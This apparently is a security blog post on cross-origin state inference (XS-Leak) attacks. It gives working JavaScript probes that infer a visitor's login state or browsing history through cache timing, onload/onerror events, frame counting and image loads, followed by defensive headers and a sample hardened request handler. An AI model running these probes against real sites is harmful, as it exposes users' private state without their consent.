
Introduction:
Cross-Origin State Inference (COSI) attacks represent a sophisticated evolution in the landscape of side-channel threats, specifically targeting web applications. By leveraging fundamental browser mechanisms, attackers can infer a user’s state or actions on a target site without direct access, posing a significant risk to privacy and security.
Learning Objectives:
- Understand the core mechanics of Cross-Origin State Inference (COSI) attacks and how they differ from traditional XSS.
- Learn to identify and mitigate potential COSI vectors in web applications through secure coding practices.
- Implement browser-level and server-side defenses to protect users from state inference leaks.
You Should Know:
1. Detecting Resource Load Times with performance.now()
The High Resolution Time API (`performance.now()`) can be used to measure how long a cross-origin resource takes to load. (The older `performance.timing` object only describes the current document’s own navigation and cannot time individual fetches.) The response to a `no-cors` request is opaque, so the attacker can read neither its body nor its status, but the time until the promise settles is still observable, and a cache hit is orders of magnitude faster than a network round trip.
var start = performance.now();
fetch('https://vulnerable-site.com/secret-page', {mode: 'no-cors', credentials: 'include'})
  .then(() => {
    // The response is opaque: no body, no status; only the elapsed time is observable.
    var loadTime = performance.now() - start;
    console.log('Resource load time:', loadTime);
    // A time close to zero means the response came from the HTTP cache,
    // i.e. this browser fetched the resource before (within this cache partition).
  });
Step-by-step guide:
This code snippet measures the time taken to fetch a resource from a target origin. An attacker’s site can initiate such a request. A load time of a few milliseconds (versus tens or hundreds for a network round trip) indicates that the resource was already in the HTTP cache, implying the user has visited ‘secret-page’ before; `credentials: 'include'` only adds the victim’s cookies if the target sets them with `SameSite=None`. Two practical caveats: the probe itself stores the response, so each resource can be tested only once per cache partition unless the attacker evicts it again; and all major browsers now key the HTTP cache by top-level site as well as URL (Chrome since 86, Firefox since 85, Safari for much longer), so a cross-site attacker page sees its own empty partition rather than the victim’s entries. The technique remains relevant where partitioning is absent, where the attacker runs code in the same site as the target (for example a subdomain takeover), and for responses whose server-side generation time itself depends on user state.
2. Exploiting Cache Timing with `fetch()` and AbortController
Instead of comparing raw timings, the probe can race the fetch against a short timer: AbortController cancels the request after a deadline that a cache hit will always beat and a network fetch almost never will, which also avoids completing the download.
const controller = new AbortController();
const signal = controller.signal;
setTimeout(() => controller.abort(), 100); // Abort after 100ms; a cache hit settles in a few ms
fetch('https://target-app.com/profile-image.jpg', {mode: 'no-cors', signal})
  .then(() => console.log('Cache HIT: this browser loaded the resource before'))
  .catch(() => console.log('Cache MISS, slow network, or request blocked'));
Step-by-step guide:
This script attempts to fetch a resource that the target application only loads for authenticated users (such as the profile image shown on a logged-in page). It uses an AbortController to cancel the request after 100ms. If the request completes before the abort, the resource was served from the browser’s cache (a “hit”), meaning this browser loaded it earlier; if that only ever happens to authenticated users, the user is logged in. A timeout and catch suggest a “miss”, potentially meaning the user is logged out. Note that the catch branch also fires for network errors and blocked requests, so a miss is much weaker evidence than a hit, and the 100ms cut-off should be calibrated against a deliberately cache-busted URL on the same server rather than hard-coded. As with the previous technique, cache partitioning by top-level site defeats this from a cross-site page.
3. XS-Leaks via Error Events and Onload/Onerror Handlers
Differences in response status codes, or in whether a response is accepted as a script, can be detected by attaching `load` and `error` handlers to an embedded resource, such as an image or script, without reading its content.
var script = document.createElement('script');
script.src = "https://vulnerable-site.com/state-dependent-endpoint";
script.onload = () => console.log("State: Condition A (e.g., Logged In)");
script.onerror = () => console.log("State: Condition B (e.g., Logged Out)");
document.head.appendChild(script);
Step-by-step guide:
This technique creates a script element pointing to an endpoint that behaves differently based on user state (e.g., returns a 200 OK when logged in and a 404 when not). The `onload` event fires once the response was fetched with a 2xx status and accepted as a script (it fires even if the code fails to parse; parse errors are reported to `window.onerror`, not to the element), while `onerror` fires for 4xx/5xx responses, network failures and blocked loads. By observing which event triggers, an attacker can infer the user’s state on the target site. Two points matter in practice: the request only carries the victim’s session if the target’s cookies are sent cross-site (`SameSite=None`), and sending `X-Content-Type-Options: nosniff` together with a non-JavaScript `Content-Type` makes the browser reject the response as a script in both states, which closes this particular oracle for JSON and HTML endpoints. `Cross-Origin-Resource-Policy` closes it for all subresource loads regardless of type.
4. Frame Counting Techniques for Page State Inference
The number of frames inside a page can reveal its state: a dashboard that embeds widgets for a logged-in user and a login page with no iframes look different. Unusually, the Same-Origin Policy does not hide this number: `window.length` (the count of child frames) is one of the few properties a document is allowed to read on a cross-origin window.
var iframe = document.createElement('iframe');
iframe.src = "https://target-site.com/dashboard";
iframe.onload = function() {
  // contentWindow.length is readable cross-origin; contentWindow.document is not.
  // (The attacker page's own `frames.length` would only count this page's frames.)
  var frameCount = iframe.contentWindow.length;
  console.log("Inferred frame count:", frameCount);
  // e.g. 3 child frames => dashboard rendered (logged in), 0 => login page
};
document.body.appendChild(iframe);
Step-by-step guide:
This code embeds the target site in an iframe. After it loads, it reads `contentWindow.length`, the number of frames inside the embedded page. Different page states (logged in versus logged out, an error page versus the real page) often render a different number of frames, so the count alone leaks the state without any access to the embedded document. The same property is readable on the window returned by `window.open()`, so the attack also works against pages that refuse to be framed but can be opened in a popup; because the embedded page creates its own frames asynchronously, the count should be sampled after `load` or polled for a short while. Framing is blocked by `X-Frame-Options: DENY` or `Content-Security-Policy: frame-ancestors 'none'`, and `Cross-Origin-Opener-Policy: same-origin` severs the popup reference so that `length` cannot be read there.
5. Network Bandwidth Probing with Large Image Requests
An attacker can measure the time to download a large, state-specific resource to infer if a user has access, which might indicate membership status or tiered service levels. The probe must point at something the browser can decode as an image: an `Image` element given a video file fires `onerror` regardless of access and leaks nothing.
var img = new Image();
var fileSize = 5 * 1024 * 1024; // Known size of the premium image in bytes (assumed value)
var startTime = Date.now();
img.src = "https://premium-service.com/large-premium-image.jpg"; // Large, access-controlled image (hypothetical path)
img.onload = function() {
  var elapsedMs = Date.now() - startTime;
  var bandwidth = fileSize / elapsedMs; // Approximate bytes per millisecond
  console.log("Image loaded in " + elapsedMs + " ms (~" + bandwidth.toFixed(1) + " B/ms): user has access");
};
img.onerror = function() {
  // Fires when the server returns an error status or a non-image body (e.g. a 403 HTML page)
  console.log("Resource access denied or not found");
};
Step-by-step guide:
This method involves loading a large image that is only accessible under certain conditions (e.g., a premium asset). Both the outcome and the elapsed time are recorded. `onload` only fires when the server returned a decodable image, so it confirms access by itself; a very fast load additionally suggests the file was already cached, i.e. the user had viewed it before. `onerror` fires when the server answered with an error status or a non-image body such as an HTML denial page, indicating the user does not have access and leaking service tier information. Two caveats: the request carries the victim’s cookies only if they are set with `SameSite=None`, and `Cross-Origin-Resource-Policy` on the image removes the observable difference entirely.
6. Browser Cache Partitioning Bypass Attempts
Understanding and testing the limits of cache partitioning is crucial. All major browsers now key the HTTP cache by the top-level site in addition to the resource URL (Chrome since version 86, Firefox since 85, Safari for much longer), so a resource cached while visiting the target is not visible to an attacker page on another site. Shared resources such as a CDN-hosted CSS framework are exactly the case partitioning was introduced for: before it, an attacker could test whether the victim had visited any site that used the framework.
<!-- Attacker's Page: probing-shared-resource.html -->
<div id="result"></div>
<script>
function probeCache(resourceURL) {
  var link = document.createElement('link');
  link.rel = 'stylesheet';
  link.href = resourceURL;
  var start = performance.now();
  link.onload = function() {
    var loadTime = performance.now() - start;
    document.getElementById('result').innerText = `Load Time: ${loadTime}ms`;
  };
  link.onerror = function() {
    document.getElementById('result').innerText = 'Load failed (blocked or not found)';
  };
  document.head.appendChild(link);
}
// Probe for a shared CSS file used by the target application
probeCache('https://target-app.net/shared-ui-framework.css');
</script>
Step-by-step guide:
This HTML/JavaScript code attempts to load a shared resource, like a common CSS framework used by the target application, and measures the load time. In a browser without a partitioned cache, a resource the victim already has cached loads in a few milliseconds, revealing that the target application was visited. With a partitioned cache the attacker page only ever sees its own partition, so the probe reads as a miss on its first load. The angles still worth testing are same-site contexts (a subdomain the attacker controls shares the partition with the target), browser versions or embedded WebViews that do not partition, and timing differences that originate at the server rather than in the cache. The technique is largely historical but underscores why strict cache partitioning is a critical browser defense.
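The probes in sections 1, 2 and 6 all hard-code a threshold. The following is an added example (not code from the original post) that combines the fetch/AbortController race with a baseline calibrated on cache-busted copies of the same URL, and runs the real probe exactly once because the first fetch itself fills the cache. The target URL, sample count and deadline are assumptions; the decision logic is kept pure so it can be checked offline with constructed timings, while the browser-only part lives in `timeFetch`.

```javascript
// Added example, not from the original post. Target URL and parameters are
// hypothetical; only timeFetch/probeCache need a browser (fetch, performance).

function median(values) {
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Classify one probe timing against a baseline of guaranteed network fetches.
// "hit" requires the probe to be at most `ratio` of the baseline median.
// A baseline that is itself near zero (offline, blocked by an extension)
// supports no conclusion at all.
function classifyCacheState(probeMs, baselineMs, ratio = 0.3) {
  if (baselineMs.length === 0) throw new Error("need at least one baseline sample");
  const baseline = median(baselineMs);
  if (baseline < 5) return { verdict: "unknown", probeMs, baseline };
  return { verdict: probeMs <= baseline * ratio ? "hit" : "miss", probeMs, baseline };
}

// Browser side: time one opaque no-cors fetch, aborting after `deadlineMs`
// so that a slow network fetch is never completed. Returns the elapsed time,
// or `deadlineMs` when the request was aborted or failed.
async function timeFetch(url, deadlineMs) {
  const controller = new AbortController();
  const timer = setTimeout(() => controller.abort(), deadlineMs);
  const start = performance.now();
  try {
    await fetch(url, { mode: "no-cors", credentials: "include", signal: controller.signal });
    return performance.now() - start;
  } catch (_) {
    return deadlineMs; // aborted or network error: treat as a full network miss
  } finally {
    clearTimeout(timer);
  }
}

// Probe `url` once. The baseline uses cache-busted copies of the same URL, so
// it reflects this client's real latency to the same server. The real probe
// runs exactly once: the first fetch stores the response, so a second sample
// of the same URL would always be a hit created by the attacker page itself.
// With the HTTP cache keyed by top-level site (Chrome 86+, Firefox 85+, Safari)
// a cross-site page gets "miss" whatever the victim's history; the probe still
// applies in same-site contexts or browsers without partitioning.
async function probeCache(url, samples = 5, deadlineMs = 2000) {
  const baseline = [];
  for (let i = 0; i < samples; i++) {
    baseline.push(await timeFetch(`${url}?nocache=${Date.now()}-${i}`, deadlineMs));
  }
  const probeMs = await timeFetch(url, deadlineMs);
  return classifyCacheState(probeMs, baseline);
}
```

From the attacker page’s console, `probeCache('https://target-app.com/profile-image.jpg').then(console.log)` prints the verdict together with both timings, which is what you want to keep when judging whether a “hit” is real or an artefact of a very fast server.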
- Mitigation: Deploying Cross-Origin Opener Policy (COOP) and Cross-Origin Embedder Policy (COEP)
The primary defense against many of these leaks is to isolate your site’s origin with the COOP, COEP and CORP headers, which together place it in a cross-origin isolated context, and to stop cross-site subresource requests from reaching state-dependent endpoints in the first place.
HTTP Response Headers Configuration:
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
Step-by-step guide:
To implement these defenses, configure your web server to send these HTTP response headers. `Cross-Origin-Opener-Policy: same-origin` puts your documents in their own browsing context group, so a page that opened you with `window.open()` loses its reference to your window (no `length`, no `postMessage`, no `closed` polling), which defeats frame counting through popups. `Cross-Origin-Resource-Policy: same-site` tells the browser not to deliver your responses to `<script>`, `<img>`, `<link>` or `no-cors` `fetch()` requests from other sites, so the load/error oracle and the image-size or timing oracles of the earlier sections never observe your real response. `Cross-Origin-Embedder-Policy: require-corp` forces every resource your page loads to opt in via CORP or CORS; together with COOP it makes the page `crossOriginIsolated`, the state required for `SharedArrayBuffer` and `performance.measureUserAgentSpecificMemory()`, which is exactly why those high-resolution primitives are withheld from non-isolated pages. Complete the set with `X-Frame-Options: DENY` or `Content-Security-Policy: frame-ancestors 'none'` (iframe-based frame counting), `X-Content-Type-Options: nosniff` (script-type confusion), `SameSite=Lax` or `Strict` session cookies (cross-site subresource requests then arrive unauthenticated and all look like the logged-out state), and a Fetch Metadata check that rejects requests carrying `Sec-Fetch-Site: cross-site` on anything other than top-level GET navigations. Finally, make state-dependent endpoints return the same status code and content type in every state, so that a request which does get through cannot be told apart by its outcome.
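As an added example (not the original post’s code), the policy below puts the server-side half of the mitigation into one request handler: a Fetch Metadata isolation check that rejects cross-site subresource requests, the isolation and anti-framing headers on every response, a `SameSite` session cookie check, and a state endpoint that answers with the same status code and content type whether or not the user is logged in, which removes the onload/onerror oracle of section 3 and the status-dependent page of section 4. The request is a plain object (in a real Node `http` server you would build it from `req.method`, `req.url` and `req.headers`); the route names and the `session` cookie are hypothetical.

```javascript
// Added example, not from the original post. Routes (/api/session, /dashboard)
// and the "session" cookie name are hypothetical; the request object is
// constructed by the caller (e.g. from a Node http.IncomingMessage).

const ISOLATION_HEADERS = {
  "Cross-Origin-Opener-Policy": "same-origin",     // popups lose their reference to us
  "Cross-Origin-Embedder-Policy": "require-corp",  // cross-origin isolated context
  "Cross-Origin-Resource-Policy": "same-site",     // our responses are not delivered cross-site
  "Content-Security-Policy": "frame-ancestors 'none'", // no iframe-based frame counting
  "X-Frame-Options": "DENY",                       // same, for older browsers
  "X-Content-Type-Options": "nosniff",             // no script-type confusion
  "Cache-Control": "no-store",                     // state-dependent responses are never cached
  "Vary": "Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-Dest, Cookie",
};

// Fetch Metadata resource isolation: reject cross-site requests unless they are
// top-level GET navigations (links, bookmarks). Requests without Sec-Fetch-Site
// come from browsers that predate Fetch Metadata and are allowed through.
function crossSiteAllowed(method, headers) {
  const site = headers["sec-fetch-site"];
  if (site === undefined) return true;
  if (site === "same-origin" || site === "same-site" || site === "none") return true;
  const mode = headers["sec-fetch-mode"];
  const dest = headers["sec-fetch-dest"];
  return mode === "navigate" && method === "GET" && dest !== "object" && dest !== "embed";
}

// Hypothetical session check. The cookie is issued with SameSite=Lax (or
// Strict), so cross-site subresource requests never carry it and all look
// logged-out to a probing page.
function isLoggedIn(headers) {
  const cookie = headers["cookie"] || "";
  return /(^|;\s*)session=[A-Za-z0-9_-]+/.test(cookie);
}

// Pure handler: returns { status, headers, body } for a request
// { method, path, headers } with lower-cased header names.
function handleRequest(req) {
  const headers = { ...ISOLATION_HEADERS };
  if (!crossSiteAllowed(req.method, req.headers)) {
    return { status: 403, headers, body: "cross-site request blocked" };
  }
  const loggedIn = isLoggedIn(req.headers);
  switch (req.path) {
    case "/api/session":
      // Same status and Content-Type in both states: a <script>/<img> probe
      // fires the same event either way, and nosniff rejects it as a script.
      return {
        status: 200,
        headers: { ...headers, "Content-Type": "application/json" },
        body: JSON.stringify({ authenticated: loggedIn }),
      };
    case "/dashboard":
      // Reachable cross-site only as a top-level navigation; it cannot be
      // framed and COOP severs popup references, so redirect vs. page is not
      // observable by another site.
      if (!loggedIn) return { status: 302, headers: { ...headers, Location: "/login" }, body: "" };
      return { status: 200, headers: { ...headers, "Content-Type": "text/html" }, body: "<h1>Dashboard</h1>" };
    default:
      return { status: 404, headers, body: "not found" };
  }
}
```

The `Vary` header matters once any caching layer sits in front of the application: without it a CDN could serve a response computed for a same-origin request to a cross-site one, or vice versa. The `/dashboard` branch still differs by state; that is acceptable only because every channel an attacker could use to observe it (framing, popup references, subresource loads) is closed by the headers above.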
What Undercode Say:
- The Illusion of Safety: Merely avoiding Cross-Origin Resource Sharing (CORS) errors is no longer sufficient for security. COSI attacks prove that even “safe” no-cors requests can leak significant information through timing, cache status, and error event side channels. Developers must shift their mindset from simply preventing data exfiltration to preventing state inference altogether.
- Defense in Depth is Non-Negotiable: Relying on a single mitigation, like cache partitioning, is a flawed strategy. A robust defense requires a layered approach, combining secure coding on the server (using same-site cookies, randomizing response times), deploying modern browser security headers (COOP, COEP, CORP), and conducting regular security audits specifically focused on side-channel vulnerabilities.
The analysis suggests that COSI attacks are not merely theoretical but represent a practical and evolving threat class. As web applications become more complex and handle increasingly sensitive data, the vectors for state inference will multiply. The security community’s response, primarily through browser-level isolation features, is a step in the right direction. However, the widespread adoption of these defenses is lagging, leaving many applications exposed. The sophistication of these attacks underscores the need for automated security tooling to evolve and detect such subtle leakages, moving beyond traditional vulnerability scanning.
Prediction:
The refinement of COSI attacks will inevitably lead to their weaponization in targeted campaigns, particularly for corporate espionage and identity verification bypass. As defenses like cache partitioning become universal, attackers will pivot towards more subtle techniques, potentially leveraging machine learning to analyze complex timing patterns from multiple vectors simultaneously. Furthermore, the integration of these methods with other exploit chains will create powerful composite attacks, making attribution and detection significantly more challenging for defense teams. The arms race between browser vendors hardening platforms and attackers discovering new side channels is set to intensify, making cross-origin isolation a baseline requirement for all security-sensitive web applications within the next two years.
Reported By: Devansh Batham – Hackers Feeds


